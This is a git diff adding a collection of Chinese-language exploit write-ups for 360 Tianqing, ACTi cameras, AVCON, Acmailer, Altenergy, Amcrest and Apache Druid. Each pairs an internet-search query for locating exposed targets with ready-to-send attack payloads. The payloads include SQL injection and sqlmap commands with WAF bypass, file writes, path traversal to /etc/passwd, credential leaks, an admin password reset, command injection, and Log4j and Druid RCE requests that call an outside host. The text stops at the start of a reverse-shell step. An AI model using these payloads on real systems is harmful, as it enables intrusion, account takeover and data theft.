diff --git a/360-新天擎终端安全管理系统存在信息泄露漏洞.md b/360-新天擎终端安全管理系统存在信息泄露漏洞.md
new file mode 100644
index 0000000..731ebba
--- /dev/null
+++ b/360-新天擎终端安全管理系统存在信息泄露漏洞.md
@@ -0,0 +1,4 @@
+## 360 新天擎终端安全管理系统存在信息泄露漏洞
+```
+GET /runtime/admin_log_confcache
+```
diff --git a/360天擎---未授权与sql注入.md b/360天擎---未授权与sql注入.md
new file mode 100644
index 0000000..f642f2d
--- /dev/null
+++ b/360天擎---未授权与sql注入.md
@@ -0,0 +1,26 @@
+## 360天擎 - 未授权与sql注入
+
+## FOFA语法
+```title="360新天擎"```
+
+
+## 鹰图
+```web.title="360新天擎"&& ip.isp="教育"```
+
+## 漏洞复现
+
+### 未授权漏洞
+```路由后拼接/api/dbstat/gettablessize```
+![](./assets/20231018183944.png)
+
+### sql注入漏洞
+比较推荐的方式先测试是否存在数据库信息泄露，存在的话大概率存在SQL注入
+```
+路由后拼接/api/dp/rptsvcsyncpoint?ccid=1
+
+{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
+```
+![](./assets/20231018184057.png)
+
+## sqlmap
+python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1
diff --git a/360天擎终端安全管理系统getsimilarlist存在SQL注入漏洞.md b/360天擎终端安全管理系统getsimilarlist存在SQL注入漏洞.md
new file mode 100644
index 0000000..06fc669
--- /dev/null
+++ b/360天擎终端安全管理系统getsimilarlist存在SQL注入漏洞.md
@@ -0,0 +1,35 @@
+# 360天擎终端安全管理系统getsimilarlist存在SQL注入漏洞
+
+# 一、漏洞简介
+天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体，兼容不同操作系统和计算平台，帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护;奇安信360天擎getsimilarlist存在SQL注入漏洞，攻击者可通过此漏洞获取敏感信息。
+
+# 二、影响版本
++ 360天擎终端安全管理系统
+
+# 三、资产测绘
++ hunter`app.name=="天擎终端安全管理系统"`
++ 特征
+
+![1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695.png](./img/K-Fg9AeJYyC3cDpF/1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695-289858.png)
+
+# 四、漏洞复现
+响应中存在`qzbkq1qpzzq`表示可能存在漏洞
+
+```plain
+/api/client/getsimilarlist?status[0,1]=(CAST((CHR(113)||CHR(122)||CHR(98)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (8327=8327) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC))&status[0]=1
+```
+
+![1699415273715-cb428a2e-00fe-4bfd-ac82-8b24b00ae99e.png](./img/K-Fg9AeJYyC3cDpF/1699415273715-cb428a2e-00fe-4bfd-ac82-8b24b00ae99e-130863.png)
+
+sqlmap
+
+```plain
+python3 sqlmap.py  -u "https://xx.xx.xx.xx/api/client/getsimilarlist?status[0,1]=1&status[0]=1" --batch
+```
+
+![1699415337786-67a38012-b2b5-492d-a8da-5dd43f15f543.png](./img/K-Fg9AeJYyC3cDpF/1699415337786-67a38012-b2b5-492d-a8da-5dd43f15f543-099829.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ll2p6g6smkyvov6w>
\ No newline at end of file
diff --git a/360天擎终端安全管理系统loglastsync存在SQL注入漏洞.md b/360天擎终端安全管理系统loglastsync存在SQL注入漏洞.md
new file mode 100644
index 0000000..3f886cb
--- /dev/null
+++ b/360天擎终端安全管理系统loglastsync存在SQL注入漏洞.md
@@ -0,0 +1,33 @@
+# 360天擎终端安全管理系统loglastsync存在SQL注入漏洞
+
+# 一、漏洞简介
+天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体，兼容不同操作系统和计算平台，帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护;奇安信360天擎loglastsync存在SQL注入漏洞，攻击者可通过此漏洞获取敏感信息。
+
+# 二、影响版本
++ 360天擎终端安全管理系统
+
+# 三、资产测绘
++ hunter`app.name=="天擎终端安全管理系统"`
++ 特征
+
+![1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695.png](./img/4AK_mPZiZs3AUv9h/1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695-052369.png)
+
+# 四、漏洞复现
+```plain
+/api/dp/loglastsync?ccid=1') AND 9421=(SELECT 9421 FROM PG_SLEEP(5)) AND ('crvL'='crvL
+```
+
+![1701002054713-6bc9dfc4-e8cb-4675-9bfe-76902dc2cc03.png](./img/4AK_mPZiZs3AUv9h/1701002054713-6bc9dfc4-e8cb-4675-9bfe-76902dc2cc03-612883.png)
+
+sqlmap
+
+```plain
+/api/dp/loglastsync?ccid=1
+```
+
+![1701002087316-de0d5792-7b7c-4d76-b094-3b25d08c9ce5.png](./img/4AK_mPZiZs3AUv9h/1701002087316-de0d5792-7b7c-4d76-b094-3b25d08c9ce5-887312.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lcp8zauczcyost59>
\ No newline at end of file
diff --git a/360天擎终端安全管理系统rptsvcsyncpoint存在SQL注入漏洞.md b/360天擎终端安全管理系统rptsvcsyncpoint存在SQL注入漏洞.md
new file mode 100644
index 0000000..009aab3
--- /dev/null
+++ b/360天擎终端安全管理系统rptsvcsyncpoint存在SQL注入漏洞.md
@@ -0,0 +1,43 @@
+# 360天擎终端安全管理系统rptsvcsyncpoint存在SQL注入漏洞
+
+# 一、漏洞简介
+天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体，兼容不同操作系统和计算平台，帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护;奇安信360天擎rptsvcsyncpoint存在SQL注入漏洞，攻击者可通过此漏洞获取敏感信息。
+
+# 二、影响版本
++ 360天擎终端安全管理系统
+
+# 三、资产测绘
++ hunter`app.name=="天擎终端安全管理系统"`
++ 特征
+
+![1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695.png](./img/qLEg5VoI2Ok1Dnar/1699415110944-92dd0793-44ec-4b3a-8b0c-cddf0465a695-979071.png)
+
+# 四、漏洞复现
+sqlmap
+
+```plain
+python3 sqlmap.py -u "https://xx.xx.xx.xx/api/dp/rptsvcsyncpoint?ccid=1" --batch --skip-waf
+```
+
+![1699458415629-df2c5e1b-d4b0-445d-a456-bafb539988d5.png](./img/qLEg5VoI2Ok1Dnar/1699458415629-df2c5e1b-d4b0-445d-a456-bafb539988d5-034790.png)
+
+文件写入
+
+```plain
+/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('123456~');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\stc.txt';drop table O;--
+```
+
+![1699458549014-42cd0a5a-b665-4a50-ad55-9d83aa571b4c.png](./img/qLEg5VoI2Ok1Dnar/1699458549014-42cd0a5a-b665-4a50-ad55-9d83aa571b4c-448311.png)
+
+写入文件位置
+
+```plain
+http://xx.xx.xx.xx/stc.txt
+```
+
+![1699458583924-6db94f8b-bbe7-4f84-b5b6-a44495337abb.png](./img/qLEg5VoI2Ok1Dnar/1699458583924-6db94f8b-bbe7-4f84-b5b6-a44495337abb-225246.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bmxoqmgt074w5sod>
\ No newline at end of file
diff --git a/360新天擎终端安全管理系统信息泄露漏洞.md b/360新天擎终端安全管理系统信息泄露漏洞.md
new file mode 100644
index 0000000..813bc4f
--- /dev/null
+++ b/360新天擎终端安全管理系统信息泄露漏洞.md
@@ -0,0 +1,25 @@
+# 360 新天擎终端安全管理系统信息泄露漏洞
+
+# 一、漏洞简介
+天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体，兼容不同操作系统和计算平台，帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护;360 新天擎终端安全管理系统存在信息泄露漏洞。
+
+# 二、影响版本
++ 360 新天擎终端安全管理系统
+
+# 三、资产测绘
++ hunter`app.name=="天擎终端安全管理系统"`
++ 特征
+
+![1698594701017-2b4351dd-e6bd-4f14-9d42-a6f7294a1fd3.png](./img/kTfByfQPYwCzZVhF/1698594701017-2b4351dd-e6bd-4f14-9d42-a6f7294a1fd3-945098.png)
+
+# 四、漏洞复现
+```plain
+/runtime/admin_log_conf.cache
+```
+
+![1698594725622-ed1bf398-20e6-427c-b1c0-027f58968ea1.png](./img/kTfByfQPYwCzZVhF/1698594725622-ed1bf398-20e6-427c-b1c0-027f58968ea1-500252.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uq0pivkgzihr7776>
\ No newline at end of file
diff --git a/ACTI-视频监控images存在任意文件读取漏洞.md b/ACTI-视频监控images存在任意文件读取漏洞.md
new file mode 100644
index 0000000..0a115bb
--- /dev/null
+++ b/ACTI-视频监控images存在任意文件读取漏洞.md
@@ -0,0 +1,30 @@
+# ACTI-视频监控images存在任意文件读取漏洞
+
+### 一、漏洞描述
+ACTI-视频监控images存在任意文件读取漏洞
+
+### 二、影响版本
+<font style="color:#000000;">ACTI</font>
+
+### 三、资产测绘
+```plain
+app="ACTi-视频监控"
+```
+
+![1721626995048-5ecae669-a849-438f-831b-f8864a7825d4.png](./img/dVTu3UYBLPA-tSD6/1721626995048-5ecae669-a849-438f-831b-f8864a7825d4-107268.png)
+
+### 四、漏洞复现
+```plain
+GET /images/../../../../../../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip
+Connection: close
+```
+
+![1721627029211-a5ec56ec-b9be-4969-a11a-e9788b489d8f.png](./img/dVTu3UYBLPA-tSD6/1721627029211-a5ec56ec-b9be-4969-a11a-e9788b489d8f-998871.png)
+
+
+
+> 更新: 2024-08-12 17:48:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mh7ce3oc3gcp5th4>
\ No newline at end of file
diff --git a/AC集中管理平台未授权漏洞.md b/AC集中管理平台未授权漏洞.md
new file mode 100644
index 0000000..2c08669
--- /dev/null
+++ b/AC集中管理平台未授权漏洞.md
@@ -0,0 +1,29 @@
+# AC集中管理平台未授权漏洞
+
+多款AC集中管理平台、智能AC管理系统、智能路由系统(HTTPD-AC1.0服务)均被发现存在严重的未授权访问安全漏洞。此漏洞允许攻击者未经授权地直接访问多个data文件，进而非法获取包括AC用户名、密码、SSID（服务集标识符）、AP BSSID（接入点基站标识符）等在内的敏感及关键信息，对系统安全构成重大威胁。
+
+## fofa
+
+```javascript
+header="HTTPD_ac 1.0"
+```
+
+## poc
+
+```javascript
+GET /actpt.data HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: keep-alive
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+```
+
+![2564642ff99c1ab0e34d89aaf507ef65](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409171614315.png)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/C7YKQlMtzWhC29M3F17CiQ
\ No newline at end of file
diff --git a/AVCON-系统管理平台download.action存在任意文件读取漏洞.md b/AVCON-系统管理平台download.action存在任意文件读取漏洞.md
new file mode 100644
index 0000000..68861b1
--- /dev/null
+++ b/AVCON-系统管理平台download.action存在任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+# AVCON-系统管理平台download.action存在任意文件读取漏洞
+
+AVCON-系统管理平台download.action存在任意文件读取漏洞，通过该漏洞读取配置文件信息，造成信息泄露漏洞
+
+## fofa
+
+```yaml
+title="AVCON-系统管理平台"
+```
+
+
+## poc
+
+```java
+GET /download.action?filename=../../../../../../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
diff --git a/AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞.md b/AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞.md
new file mode 100644
index 0000000..d1d8ef7
--- /dev/null
+++ b/AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞.md
@@ -0,0 +1,28 @@
+# AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞
+
+AVCON-网络视频服务系统通过接口 `/avcon/av_user/editusercommit.php?currentpage=1`  重置admin用户的密码，从而登录系统后台。
+
+## fofa
+
+```yaml
+title=="avcon 网络视频会议系统"
+```
+
+## poc
+
+```java
+POST /avcon/av_user/editusercommit.php?currentpage=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 226
+Connection: close
+Upgrade-Insecure-Requests: 1
+Priority: u=4
+
+userid=admin&username=administration&password=admin&rpassword=admin&question=admin&answer=123&gender=%E7%94%B7&birthday=0000-00-00&edutypeid=0&phone=&mobile=&email=&address=&postcode=&go=-2&confirm=+++%E7%A1%AE%E5%AE%9A+++
+```
+
diff --git a/Acmailer邮件系统init_ctl存在远程命令执行漏洞.md b/Acmailer邮件系统init_ctl存在远程命令执行漏洞.md
new file mode 100644
index 0000000..23e4454
--- /dev/null
+++ b/Acmailer邮件系统init_ctl存在远程命令执行漏洞.md
@@ -0,0 +1,46 @@
+# Acmailer邮件系统init_ctl存在远程命令执行漏洞
+
+# 一、漏洞简介
+Acmailer 是一款用于支持邮件服务的CGI软件。Acmailer邮件系统 init_ctl.cgi接口处远程命令执行,攻击者可通过此漏洞获取服务器权限。
+
+# 二、影响版本
++ Version≤Acmailer 4.0.2
+
+# 三、资产测绘
++ fofa`body="CGI acmailer"`
++ 特征
+
+![1708963927312-b5ae3848-2277-44b8-b799-6ef34544756b.png](./img/WasJxdH_XZeC7KZp/1708963927312-b5ae3848-2277-44b8-b799-6ef34544756b-033862.png)
+
+# 四、漏洞复现
+```plain
+POST /init_ctl.cgi HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0
+Connection: close
+Content-Length: 150
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+
+admin_name=u&admin_email=m@m.m&login_id=l&login_pass=l&sendmail_path=|id > 13619.txt | bash&homeurl=http://&mypath=e
+```
+
+![1708963961029-9e3fb68f-505d-474c-a060-38ff45f7e2db.png](./img/WasJxdH_XZeC7KZp/1708963961029-9e3fb68f-505d-474c-a060-38ff45f7e2db-076657.png)
+
+获取命令执行结果
+
+```plain
+GET /13619.txt HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0
+Connection: close
+Cookie: sid=a6d9c99e3ae98d10ee34acc24af3f536
+Accept-Encoding: gzip, deflate
+```
+
+![1708963996773-62feb337-c501-4d6c-8e66-47953f68b34d.png](./img/WasJxdH_XZeC7KZp/1708963996773-62feb337-c501-4d6c-8e66-47953f68b34d-017278.png)
+
+
+
+> 更新: 2024-02-29 23:57:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wanndz3h73av7n0s>
\ No newline at end of file
diff --git a/Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md b/Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md
new file mode 100644
index 0000000..24cabf4
--- /dev/null
+++ b/Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md
@@ -0,0 +1,29 @@
+# Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞
+
+电力系统控制软件 Altenergy Power Control Software C1.2.5版本的系统/set_timezone接口存在命令注入漏洞，攻击者可执行任意命令获取服务器权限。
+
+## fofa
+
+```yaml
+title="Altenergy Power Control Software"
+```
+
+## poc
+
+```java
+POST /index.php/management/set_timezone HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ 
+timezone=`id > rce.txt`
+```
+
+![image-20240820204404636](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408202044765.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/Zf5Jrr2pozEBVxBaV8BsgQ
\ No newline at end of file
diff --git a/Altenergy电力系统控制软件status_zigbee存在SQL注入漏洞.md b/Altenergy电力系统控制软件status_zigbee存在SQL注入漏洞.md
new file mode 100644
index 0000000..d698470
--- /dev/null
+++ b/Altenergy电力系统控制软件status_zigbee存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# Altenergy电力系统控制软件status_zigbee存在SQL注入漏洞
+
+Altenergy 电力系统控制软件中发现了一个被归类为严重漏洞。此漏洞影响文件 /index.php/display/status_zigbee 的 get_status_zigbee 函数。使用未知输入操纵参数 date 会导致 sql 注入漏洞。
+
+## fofa
+
+```javascript
+title="Altenergy Power Control Software"
+```
+
+## poc
+
+```javascript
+POST /index.php/display/status_zigbee HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+date=2024-11-06%' UNION ALL SELECT 11,CHAR(113)||CHAR(75,101,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,109,83,105,89,116,110,120,76,84,73,109,115,100,83,107)||CHAR(113,118,98,98,113),11-- wPIB
+```
+
+![image-20241122153242310](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221532381.png)
\ No newline at end of file
diff --git a/AmcrestIPCameraWebSha1Account1账号密码泄漏漏洞.md b/AmcrestIPCameraWebSha1Account1账号密码泄漏漏洞.md
new file mode 100644
index 0000000..e3c0652
--- /dev/null
+++ b/AmcrestIPCameraWebSha1Account1账号密码泄漏漏洞.md
@@ -0,0 +1,32 @@
+# Amcrest IP Camera Web Sha1Account1账号密码泄漏漏洞
+
+### 一、漏洞描述
+Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头，设备允许未经身份验证的攻击者下载管理凭据。
+
+### 二、影响版本
+<font style="color:#000000;">Amcrest-IP-Camera-Web</font>
+
+### 三、资产测绘
+```plain
+"Amcrest"
+```
+
+![1721627251064-39b3ae91-5e59-4760-9155-86c277d8cf99.png](./img/8XlmibRRnPef1JSZ/1721627251064-39b3ae91-5e59-4760-9155-86c277d8cf99-615793.png)
+
+### 四、漏洞复现
+```plain
+GET /current_config/Sha1Account1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip
+Connection: close
+```
+
+![1721627347286-63be31c8-de32-4cfb-bfbb-75d44228384e.png](./img/8XlmibRRnPef1JSZ/1721627347286-63be31c8-de32-4cfb-bfbb-75d44228384e-589306.png)
+
+![1721627357667-e73bab23-0123-4255-b16f-0aae0e14ec30.png](./img/8XlmibRRnPef1JSZ/1721627357667-e73bab23-0123-4255-b16f-0aae0e14ec30-645933.png)
+
+
+
+> 更新: 2024-08-12 17:48:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aaoz7mqhlml5nepq>
\ No newline at end of file
diff --git a/ApaceDruid存在Log4j远程命令执行漏洞.md b/ApaceDruid存在Log4j远程命令执行漏洞.md
new file mode 100644
index 0000000..9eb9752
--- /dev/null
+++ b/ApaceDruid存在Log4j远程命令执行漏洞.md
@@ -0,0 +1,30 @@
+# Apace Druid存在Log4j 远程命令执行漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(36, 41, 46);">Apache Druid是一个实时分析型数据库，旨在对大型数据集进行快速的查询分析（"OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景，同时，Druid也通常被用来助力分析型应用的图形化界面，或者当做需要快速聚合的高并发后端API，Druid最适合应用于面向事件类型的数据。Log4j是Apache的一个开源项目，该漏洞产生的原因在于Log4j在记录日志的过程中会对日志内容进行判断，如果内容中包含了${，则Log4j会认为此字符属于JNDI远程加载类的地址。Apache Druid 使用了该项目进行记录日志，攻击者通过构造恶意的代码即可利用该漏洞，从而导致服务器权限丢失</font>
+
+# <font style="color:rgb(36, 41, 46);">二、影响版本</font>
++ Apache Druid
+
+# 三、资产测绘
+```java
+title="Apache Druid"
+```
+
+![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/x80mTfAxrWUUsm3N/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-632900.png)
+
+# 四、漏洞复现
+```java
+GET /druid/coordinator/v1/lookups/config/${jndi:ldap://pvibhhxnwt.dgrh3.cn} HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
+Content-Length: 995
+Connection: close
+```
+
+![1718118782988-83dafd63-a369-410f-9799-f0866733f9f1.png](./img/x80mTfAxrWUUsm3N/1718118782988-83dafd63-a369-410f-9799-f0866733f9f1-055296.png)
+
+
+
+> 更新: 2024-06-17 09:22:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ua1fln02hehbuf7g>
\ No newline at end of file
diff --git a/ApaceDruid存在任意文件读取漏洞(CVE-2021-36749).md b/ApaceDruid存在任意文件读取漏洞(CVE-2021-36749).md
new file mode 100644
index 0000000..088d95b
--- /dev/null
+++ b/ApaceDruid存在任意文件读取漏洞(CVE-2021-36749).md
@@ -0,0 +1,31 @@
+# Apace Druid存在任意文件读取漏洞(CVE-2021-36749)
+
+# 一、漏洞简介
+<font style="color:rgb(36, 41, 46);">Apache Druid是一个实时分析型数据库，旨在对大型数据集进行快速的查询分析（"OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景，同时，Druid也通常被用来助力分析型应用的图形化界面，或者当做需要快速聚合的高并发后端API，Druid最适合应用于面向事件类型的数据。Apace Druid存在任意文件读取漏洞</font>
+
+# <font style="color:rgb(36, 41, 46);">二、影响版本</font>
++ Apache Druid < 0.20.1
+
+# 三、资产测绘
+```java
+title="Apache Druid"
+```
+
+![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/zvg_dvGP6RhRXWMv/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-937404.png)
+
+# 四、漏洞复现
+```java
+POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
+Host: 
+Content-Length: 478
+Content-Type: application/json;charset=UTF-8
+
+{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
+```
+
+![1718117802135-f92f986f-5890-432f-a686-de5f7ae3729e.png](./img/zvg_dvGP6RhRXWMv/1718117802135-f92f986f-5890-432f-a686-de5f7ae3729e-877497.png)
+
+
+
+> 更新: 2024-06-17 09:22:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gb0owzvtgrgfqdii>
\ No newline at end of file
diff --git a/ApaceDruid存在未授权漏洞.md b/ApaceDruid存在未授权漏洞.md
new file mode 100644
index 0000000..c3142bc
--- /dev/null
+++ b/ApaceDruid存在未授权漏洞.md
@@ -0,0 +1,24 @@
+# Apace Druid存在未授权漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(36, 41, 46);">Apache Druid是一个实时分析型数据库，旨在对大型数据集进行快速的查询分析（"OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景，同时，Druid也通常被用来助力分析型应用的图形化界面，或者当做需要快速聚合的高并发后端API，Druid最适合应用于面向事件类型的数据。Apace Druid存在未授权漏洞</font>
+
+# <font style="color:rgb(36, 41, 46);">二、影响版本</font>
++ Apache Druid < 0.20.1
+
+# 三、资产测绘
+```java
+title="Apache Druid"
+```
+
+![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/BoWlew1AA2lJSFEI/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-039076.png)
+
+# 四、漏洞复现
+直接访问地址+端口
+
+![1718117298072-1908926e-66e1-422f-87ef-2a43156cddbb.png](./img/BoWlew1AA2lJSFEI/1718117298072-1908926e-66e1-422f-87ef-2a43156cddbb-167640.png)
+
+
+
+> 更新: 2024-06-17 09:22:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fm299en8btqeseh1>
\ No newline at end of file
diff --git a/ApaceDruid存在远程代码执行漏洞(CVE-2021-25646).md b/ApaceDruid存在远程代码执行漏洞(CVE-2021-25646).md
new file mode 100644
index 0000000..4ec148a
--- /dev/null
+++ b/ApaceDruid存在远程代码执行漏洞(CVE-2021-25646).md
@@ -0,0 +1,52 @@
+# Apace Druid存在远程代码执行漏洞(CVE-2021-25646)
+
+# 一、漏洞简介
+<font style="color:rgb(36, 41, 46);">Apache Druid是一个实时分析型数据库，旨在对大型数据集进行快速的查询分析（"OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景，同时，Druid也通常被用来助力分析型应用的图形化界面，或者当做需要快速聚合的高并发后端API，Druid最适合应用于面向事件类型的数据。Apace Druid存在远程代码执行漏洞(CVE-2021-25646)</font>
+
+# <font style="color:rgb(36, 41, 46);">二、影响版本</font>
++ Apache Druid < 0.20.1
+
+# 三、资产测绘
+```java
+title="Apache Druid"
+```
+
+![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/eTVsJmumkOXRu6la/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-258372.png)
+
+# 四、漏洞复现
+```java
+POST /druid/indexer/v1/sampler HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: application/json, text/plain, */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/json
+Content-Length: 995
+Connection: close
+
+
+{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping oujgprwnew.dgrh3.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
+```
+
+![1718117950461-ed2955b8-c697-4046-a13c-c7ff2a2cb8fd.png](./img/eTVsJmumkOXRu6la/1718117950461-ed2955b8-c697-4046-a13c-c7ff2a2cb8fd-758944.png)
+
+反弹shell
+
+```java
+POST /druid/indexer/v1/sampler HTTP/1.1
+Host: 
